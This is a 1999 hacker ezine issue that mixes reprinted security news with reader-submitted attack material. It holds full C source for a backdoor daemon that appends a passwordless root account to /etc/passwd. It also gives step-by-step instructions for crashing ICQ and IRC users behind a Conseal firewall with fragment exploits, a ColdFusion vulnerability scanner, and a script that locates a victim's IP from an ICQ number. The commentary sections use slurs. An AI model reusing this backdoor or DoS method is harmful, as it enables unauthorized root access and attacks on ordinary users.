Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 02
Antidote Volume 2 Issue 2
(5/10/99)
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
**
------------------------------
Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We
have over 380 subscribers so far and we hope to get more. Please keep in mind that this is
an educational ezine in wich we are not responsible for any information on here that you might
use in the wrong and improper way. Also, please keep in mind that just because we 'print' this
information, that it doesn't mean that we made the thing or the exploit up. Most everything in
this magazine is made by someone else and is recieved second hand (sent to us), in wich is
printed/posted on here by us.
--=\\Contents\\=--
0.00 - Beginng
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Erasing Trails
1.02 - Domain Name Glitch
1.03 - Java Glitch
1.04 - Security Hole in Firewalls
1.05 - backdoor.c
1.06 - Cold Fusion Scanner
1.07 - UIN2IP
2.00 - Misc.
2.01 - Hacking Group Report
2.02 - AntiOnline
2.03 - Cold Fusion
----------------------------
--=\\0.00\\=--
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that
would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically
current news and happenings in the underground world. We aren't going to teach you how to
hack or anything, but we will supply you with the current information and exploits. Mainly
Antidote is just a magazine for people to read if they have some extra time on there hands
and are bored with nothing to do. If you want to read a magazine that teaches you how to
hack etc, then you might want to go to your local bookstore and see if they carry '2600'.
----------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question isn't
on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics, why is
that?
Antidote is for everyone, all we are basically is a news ezine that comes out once a
month with the current news, exploits, flaws and even programming. All of the articles
that are in here are recieved second hand (sent to us) and we very rarely edit anyone's
articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent to me
through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve Antidote the second we release it and it
will be sent as an attachments
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to
be published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it
to us first. If you sent us something and we didn't e-mail you back, then you might want
to send it again because we probably didn't get it (we respond to all e-mails no matter
what). We might use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it or
not.
Well thats it for our FAQ. If you have a question that is not on here or the question is
on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated
every month.
----------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and We
are sorry for the Misunderstanding. Well, here are the shout outs:
Duece ox1dation
Lord Oak Forlorn
Altomo 0dnek
PBBSER HNN [www.hackernews.com]
Thepoison.org Retribution
403-security.org EazyMoney
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
----------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one that
we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has
written about/on this topic so that way you don't waste your time on writing something that
won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take
Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something that
you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and we will review the article and put it in Antidote (if we like it).
----------------------------
--=\\1.00\\=--
1.01 --=\\Erasing Trails\\=--
[www.wired.com]
Email leaves a trail. Zero-Knowledge Systems is out to cover it up.
The Canadian privacy technology start-up said Monday that it had signed up 50 Internet
service providers and networks to its Freedom Network, a software-service combination
meant to bring more anonymity to Net users.
"This represents the first time that ISPs have taken concrete steps to address users'
privacy concerns," said Austin Hill, president of Zero-Knowledge Systems in a statement.
The company announced the news at this week's ISPCon in Baltimore.
Mail servers at participating ISPs and networks use the service to encrypt an email
message's data and route it via an untraceable path, Zero-Knowledge said. Zero-Knowledge
says the technique protects users from uninvited scrutiny of their online activities.
The 50 participating providers and networks -- which don't include any high-profile US
ISPs -- are located in the United States, Great Britain, the Netherlands, Japan, Canada,
Austria, and Australia.
Also announced at ISPCon on Monday was a plan by Inktomi and Sandpiper Networks to merge
two technologies that take different approaches to speeding the delivery of Web pages to
end users.
Sandpiper Networks said it plans to integrate its Adaptive Content Distribution
technology with Inktomi's Traffic Server network caching technology.
Inktomi's Web-caching technology creates local copies of an ISP's most frequently
requested pages for its users. The reactive process stores Web content according
to the frequency of customers' requests.
Sandpiper's Footprint service is driven more by the decisions of content providers.
Heavily visited Web sites sign up for Footprint to expressly get their content on the
geographically dispersed Sandpiper Footprint network. Both systems work on the principle
of reducing the network distance between users and Web-page content.
The companies said Inktomi's Traffic Server will provide cache platform to help power
Sandpiper's content servers for the Footprint network.
As part of the agreement, Inktomi has also agreed to invest in Sandpiper's $21.5-million,
second-round financing. Other investors include America Online, Eagle New Media
Investment LLC, an investment affiliate of the Times-Mirror Company, and
Hambrecht & Quist.
http://www.wired.com/news/news/technology/story/19327.html
----------------------------
1.02 --=\\Domain Name Glitch\\=--
[www.wired.com]
As the "test period" for new domain name registrars officially began, Network Solutions
continued to suffer from technical glitches.
Work was completed on the Internic Registration Services database over the weekend. On
Monday, however, a problem at Network Solutions prevented some of its customers from
making changes to their domain names.
Network Solutions spokesperson Brian O'Shaughnessy tried to downplay the inconvenience.
"It runs the gamut from negligible to probably a fair level of nuisance to registrants
who are trying to do some changes to their site."
The Internic database generally lists technical, administrative, and billing contacts,
called "handles," for domain name owners. A user must use his or her handle to make
changes to a site. For example, if a domain administrator wanted to add to the domain a
server with a new IP address, he would have to use his handle -- often an email
address -- to notify Network Solutions of the change.
Some domain name handles started disappearing over the weekend, and Network Solutions
has yet to determine how many domain name holders have been affected.
"Some files just list the administrative and technical contacts and won't list the
billing contact," O'Shaughnessy said.
Some customers have complained that none of the contact listings appear for some
domains, which was confirmed by searching the Network Solutions database.
O'Shaughnessy insisted that the content of the database was still intact internally at
Network Solutions.
But some customers were outraged at another in a long string of failures by Network
Solutions.
"The handle is the most important thing in the [registration] database," said Danish
Internet lawyer and author Dennis Willardt Zewillis. "It is a point of contact -- so that
only administrative or technical contact can change domain names around from server to
server."
Zewillis' domain, domainnamelaw.com, was missing its contact information when he looked
it up on Friday night, and it was still missing on Monday.
"I think [Network Solutions was] trying to hide how easy it is to really mess up the
whole domain name system," Zewillis said. "And that's worrying me a lot. It's happening
every month."
In January, Zewillis alerted Network Solutions to a far more serious problem: Instead of
disappearing, domain name contacts were temporarily reassigned at random to people who
were not associated with those domains.
"They were changed so that other people's email addresses were listed as the email
contact," he said. "This gave the person listed as the contact the ability to make
changes to a domain." [A man in Canada who was assigned control over a spate of domains]
could have totally messed around with 100,000 domains."
Zewillis said that, at the very least, Network Solutions should have notified customers
about this problem.
Other users reported the same problem on Internet mailing lists on Monday. Some were
equally dissatisfied with Network Solutions' response that their contact information
would reappear at some point in the near future.
Derrick Bennett, who runs a domain name management company, agreed that it was the
latest in a series of problems.
"The only technical effect this has is in the time I have wasted calling NetSol's
non-800 number [to find out what was wrong] and the time I will spend next week checking
all of my domains again," said Bennett.
Two months ago, Bennett said a domain that his company managed was mistakenly redirected
to another Web site. "They had done a global DNS change for another customer and
accidentally changed my customer's record to point at another DNS server."
It took two days to fix and cost his customer time and lost revenue "for something they
have no control over and no recourse for," Bennett said.
Network Solutions attributes the problems to the growth of the Internet.
"You're dealing with an industry that is essentially the fastest-growing segment of the
Internet," O'Shaughnessy said. "More people are getting on the Net and they have to go
through Network Solutions."
http://www.wired.com/news/news/technology/story/19342.html
----------------------------
1.03 --=\\Java Glitch\\=--
There is a new bug that causes the Windows 95 and 98 operating system to crash. Joseph
Ashwood (the 'foudner') said that it keeps creating multiple computing processes called
"threads". What it does it is keeps creating these threads until the system runs out of
memory (or RAM) forcing you to reboot your computer.
Microsoft and Sun identified or called this program a "denial of service attack" (or a
DOS). Considering that it overloads the system and slows it down.
For more information, visit Joseph Ashwood's homepage wich is located at:
http://www-scf.usc.edu/~ashwood
----------------------------
1.04 --=\\Security Hole in Firewalls\\=--
SECURITY HOLES IN CONSEAL PC FIREWALLS
Anther seucrty hole in the Conseal PC Firewall a.k.a. signal9
Just think of all the wanna be "hackers" that are going to crash cuz of this dos/oob
atack. I think it is funny as hell.
This trick works best with ICQ and IRC
I write this for educational use only!!
If you get kicked off your isp cuz you did not do it right it is your own damn falt not
mine.
Here we go,
First off get the victims ip# off ICQ or on IRC they could be spoofed type this to get
a the real ip# on IRC /dns <there name>.Which gives:<therename>=+user@194.134.10.162.
This is his true ip #4. Now once again you /dns 194.134.10.162. This time, there is a
response Resolved to <the dns user resolved> If he/she has you on there ignore list on
ICQ then make another account and readd that uin# or Try to find some one there talking
to that is on the victims list and is on your list too either way you'll get their ip#.
What you got to do now is open a exploit (nestea or boink, newtear etc for Linux) (the
best to use is Exploit Generator v0.85 for Windows) run a netstat "dns their ip#" get
the port open from that host. You should now have the victims ip# and port , then send
a packet just 1 from a regognized host they talk to seldomly "note" 79% firewall users
have such fucked up rulsets or so many incoming hosts that they let 1 packet through.
that packet is let through on their ruleset, so it registers =) ding! It may take a while
for the packet to send the whole fragment but within a matter of seconds. Boom watch the
dumb fuck go offline. There are other ways of forcing backdoors open on conseal PC
firewall "considering it has 2 flaws" As to be said by many firewall annaylists "conseal
pc firewall" is the most secure firewall to prevent attacks against hackers. Well you
annalzers check twice next time :)
This has been tested aginst win nt 4.0 win 95/98
I would like to say about 99% considering you have some firewall warrior out amongst us.
This is good to prove to pepole that think there really secure that thay ain't got shit
basicly. Even lamers can prove them worng.
EazyMoney
eazy_money@Cyber-Strike.com
----------------------------
1.05 --=\\backdoor.c\\=--
/*
A rip off a sockets tutorial i found somewhere cause I didn't feel like
writing stupid basic sockets code when I had it in my src directory
already.
*/
/* Greets:
Undernet Channels:
#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
Groups:
The LegionOOT (www.legionoot.cc), Team Sploit
People:
Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
F-o-X, NeonMatrix, Azmodan, & Venomous
/*
Usage (setup):
# gcc -o backdoor backdoor.c
# ./backdoor password &
Usage (using):
telnet to host (port 505) --> type the password (don't wait for a
prompt, there isn't one so its less obvious its a backdoor) -->
type 1or 2. And yes it's _supposed_ to disconnect you after
each command.
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#define PORT 505
#define MAXDATASIZE 100
#define BACKLOG 10
void handle(char *command);
int main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes;
char *bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char buf[MAXDATASIZE];
char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
send '7h1s b0x 1s 0wn3d' to all people on the box: ";
if (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
{
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
while(1) { /* main accept() loop */
sin_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \
&sin_size)) ==
{
perror("accept");
continue;
}
inet_ntoa(their_addr.sin_addr);
if (!fork()) {
recv(new_fd, buf,
MAXDATASIZE, 0);
bytes = strstr(buf, argv[1]);
if (bytes != NULL){
send(new_fd, ask, sizeof(ask), 0);
numbytes=recv(new_fd, buf,
MAXDATASIZE, 0);
buf[numbytes] = '\0';
handle(buf);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
processes */
}
}
void handle(char *command)
{
FILE *fle;
if(strstr(command, "1") != NULL)
{
fle = fopen("/etc/passwd", "a+");
fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
fclose(fle);
}
if(strstr(command, "2") != NULL)
{
system("wall 7h1s b0x 1s 0wn3d");
}
}
PBBSER
pbbser@legionoot.hypermart.net
----------------------------
1.06 --=\\Cold Fusion Scanner\\=--
/*
COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
"Cold Fusion Application Server Advisory" dated 4.20.1999
you can find a copy of this advisory and all other
l0pht Security Advisories here:
http://www.l0pht.com/advisories.html
much of this program was blatently copied from the cgi scanner released about
a week ago, written by su1d sh3ll... I just want to give credit where credit
is due... this particular scanner was "written" (basically modified) by
hypoclear of lUSt - Linux Users Strike Today... I know that it is trivial to
check to see if a server is vulnerable, but I had fun doing this so who the
heck cares if I want to waste my time...
while I'm here I minds well give shout outs to:
Phrozen Phreak (fidonet rules)
Special K (you will never get rid of my start button ;-)
go powerpuff girls (he he) ;-)
compile: gcc -o coldscan coldscan.c
usage: coldscan host
tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cfbuff[1024];
char *cfpage[5];
char *cfname[5];
cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
cfname[1] = "openfile.cfm ";
cfname[2] = "displayopenedfile.cfm ";
cfname[3] = "exprcalc.cfm ";
if (argc<2)
{
printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
printf("\nusage - %s host \n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
printf("scanning...\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
while(count++ < 3)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cfname[count]);
for(numin=0;numin < 1024;numin++)
{
cfbuff[numin] = '\0';
}
send(sock, cfpage[count],strlen(cfpage[count]),0);
recv(sock, cfbuff, sizeof(cfbuff),0);
cgistr = strstr(cfbuff,foundmsg);
if( cgistr != NULL)
printf("Exists!\n");
else
printf("Not Found\n");
close(sock);
}
}
----------------------------
1.06 --=\\UIN2IP\\=--
#!/usr/bin/perl
#
# coded, (i.e. slapped together in a lazy-ass way) by Dr. Labrat
#
# Disclamer: If you use this to F*ck someone up, you are a bad, bad person. It wasn't me.
# You are on your own.
#
# Simple- give it a UIN and it will try to give you the IP address of the victim.
#
# Only works if the user is online and is using the ICQ webserver, but then
# that is probably what you need anyhow :-)
# see www.labrat.cx for icqget.pl for getting files from the victim...
# Thought for the day: Using this makes you a script-kiddie.
#
# Thx to Packet St0rm
$uin=$ARGV[0];
$iaddr= gethostbyname("members.icq.com");
if ($uin) {
$url = "/$uin";
} else {
die "No uin - Duh.\n";
}
use IO::Socket;
use IO::Handle;
$port = 80;
$proto = getprotobyname("tcp");
$paddr = sockaddr_in($port, $iaddr);
print "ICQ UIN to IP rsolver, by Dr. Labrat\n";
socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(DATA, $paddr) or die "Connect error: $!";
autoflush DATA 1;
print "Connected to members.icq.com...\n";
print "Trying to resolve UIN: $uin\n";
print DATA "GET $url HTTP/1.0\r\n\r\n\r\n";
@data=<DATA>;
if ( $data[0]=~/OK/){
foreach $chunk (@data) {
if ( $chunk=~/myhome.gif/) {
print "Found UIN\n";
$sneak=$chunk;
last;
}
}
}
if ($sneak) {
print "Snarfed the IP address!\n";
} else {
die "User not online or not running ICW webserver, maybe doesn't even exist!\n";
}
@ip=split(/\"/,$sneak);
$realip=substr($ip[1], 7,15);
print "\n$realip\n\n";
print "Done....\n";
close DATA;
----------------------------
--=\\2.00\\=--
2.01 --=\\Hacking Group Report\\=--
With more and more people connecting to the Internet these days, there's bound to be
more new hackers and hacking groups. In this issue of Antidote we will be looking at
a group that goes by the name of "The Hong Kong Danger Duo".
They claim not to be elite, and they call themselves 'script kiddies', but "The Hong Kong
Danger Duo" ( HKDD ) seems to be far from that. They strike here and there, but when
they do, their creative and funny web pages are a site to behold. The members of HKDD
which are Kung-P00, SpecialK, B0y wund3r, Jamaican J1m, Butt3ry L0bster M4n, and
Phel0n bring a sense of humor to the otherwise dull and un-inventive web page hacks in
resent history.
The HKDD are truly innovative and intelligent because they bring back the humor in
web page hacking. Unlike most hacks that only have " w3 0wn j00.. fj34|2 0u|2 3|2337
|20071n' 4b1l17135 f00" or something gay like that, the HKDD have creative and colorfull
pages that poke fun at the admin, whoever they are flaming at that time, and show off
their elite HTML skills.
Hopefully in the near future, Antidote would like to have an interview with the HKDD.
If you ever get the chance to see a HKDD hack, it's worth it.
0dnek
----------------------------
2.02 --=\\Antionline.com\\=--
Yep. Antionline.com. It's gayer than ever. With it's new site Anticode.com,
and the promotion of Caroline Meinel's "Hacker Wargames", John Varenimastupidbitch,
also known as JP, seems to be getting newer and gayer ideas to help Antionline.com
become somewhat popular, which will never happen.
Anticode.com is played off to be a "Site for security consultants", which basically means
that's it a cheap Rootshell.com rip-off. It offers exploits, sniffers, and virus code
on it's web site to promote computer security. Even though the exploits are organized
by OS and have descriptions by them, which is the only good thing about the entire
site, It still remains gay and doesn't need to be visited.
Along with the gayness of Anticode.com, is the promotion of Caroline Meinel's "Hacker
Wargames". The games seem to be posted and ran to help teach people about computer
security without breaking the law. "This isn't to train computer criminals" says one
site associated with the "Hacker Wargames". But, what else do they expect by offering
completely vunerable servers to the public without fear of getting busted? Doesn't make
much sense huh?
The "Wargames" has a couple boxes open and a Cisco Router to hack into, also. Along with
these boxes, are hints to l/p's for each box and for the Cisco Router, so someone looking
to learn a little bit more about computer security can log into the box of their choice
and attempt to root the server. The award for wasting your time is your own personal
web page on the server you rooted. But remember, their not trying to train computer
criminals.
0dnek
----------------------------
2.03 --=\\Cold Fusion\\=--
As many of you saw last issue, we had the new cold fusion vulnerability. This has caused
a lot of problems for many servers and virtualy hosted domains. Many sites have been
vandalized because of this bug and it has happened repeatedly to each server / domain.
An example of this would be: www.towngreen.com, they have been hacked 8 times, in wich 4
of them were because of the cold fusion vulnerability. Many sites / servers are finally
picking up on this and fixing it. Since all of the servers are fixing this problem, the
press is picking up on it also, here is an article that I found on ZDNet:
Article from: http://www.zdnet.com/zdnn/stories/news/0,4586,1014542,00.html
Hackers whack ColdFusion users
By Jim Kerstetter and Antone Gonsalves, PC Week
April 29, 1999 3:09 PM PT
New research on a five-month-old security vulnerability has put hackers on the prowl and
a software company on the hot seat.
Last week, L0pht, a site that devotes itself to discussions on computer security, posted
a warning about a vulnerability in the remote administration features of Allaire Corp.'s
ColdFusion Application Server
The vulnerability enables a hacker to gain access to all the data stored on that Web
server and, in the process, install software to create a back door into the rest of the
network.
Since that warning was posted last week -- along with a patch from Allaire (Nasdaq:ALLR)
-- security experts estimate that more than 100 sites have been hit.
Example app is to blame
Adam Berrey, product marketing director for ColdFusion, said the security breach
resulted from an example application that shipped with the server's documentation. Once
the application was deployed, a hacker could use it as a doorway to files on the server.
"In February, when we first discovered this issue, we sent out an e-mail to all of our
registered customers, and we also proactively contacted all of our key accounts," Berrey
said. "We may not have the name of every single customer in our database but I think
we've done a very aggressive job."
But customers are questioning whether Allaire did do enough to warn them. One of the
companies that was missed was NetGrocer Inc., of New York.
Ari Sabah, vice president of technology, said one of his developers learned of the
problem from an e-mail sent by a friend who also worked with ColdFusion. The security
flaw and the availability of a patch on Allaire's Web site had been discussed on the
site's discussion group.
"Officially, we didn't get anything from [Allaire]," said an annoyed Sabah. "They were
too busy going public. They forgot their customers and they forgot who got them there."
Berrey said a patch for the problem was posted on Allaire's Web site during the first
week of February and a maintenance release of the server, ColdFusion 4.01, will be
available Friday for free download from the company's site.
Hard hit
Still, the ColdFusion hack is not necessarily new. In December, Phrack Magazine first
publicized the vulnerability. But it wasn't until the past several weeks that it gained
the attention of hackers, who have made it clear that many ColdFusion users haven't
installed the patch. One site, a West Coast ISP that hosts at least 30 domains, was
particularly hard hit.
A hacker, going by the name of MostHateD of GlobalHell, was able to penetrate the
company's Web server and gain access to at least three hard drives. In the process, the
hacker claimed to have gained access to banking records, mail server passwords, illegally
copied software, and even a "nuke" utility -- an illegal piece of software that can be
used to launch a denial of service attack against another server.
The vulnerability ties into remote administration tools with ColdFusion that are exposed
by the sample application. Allaire has its own server-side scripts, similar to CGI, that
can be manipulated by an attacker. Once inside, the attacker can upload and download files
and replace binary files, said Chris Rouland, director of Internet Security Systems Inc.'s
X-Force consulting group.
Rouland analyzed the attack after being alerted to it by PC Week.
"If you can replace a binary on a computer system, you can back door it and force it to
do whatever you want to do," he said.
Allaire, of Cambridge, Mass., completed its initial public offering of 2.5 million shares
in January.
If you don't know what the Cold Fusion Vulnerability is,
then please see Antidote Vol2 Issue1
Lord Oak
lordoak@thepoison.org
----------------------------
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in Antidote is done by Lord Oak and permission is needed before using it.
Copyright Thepoison.org 1998, all rights reserved.
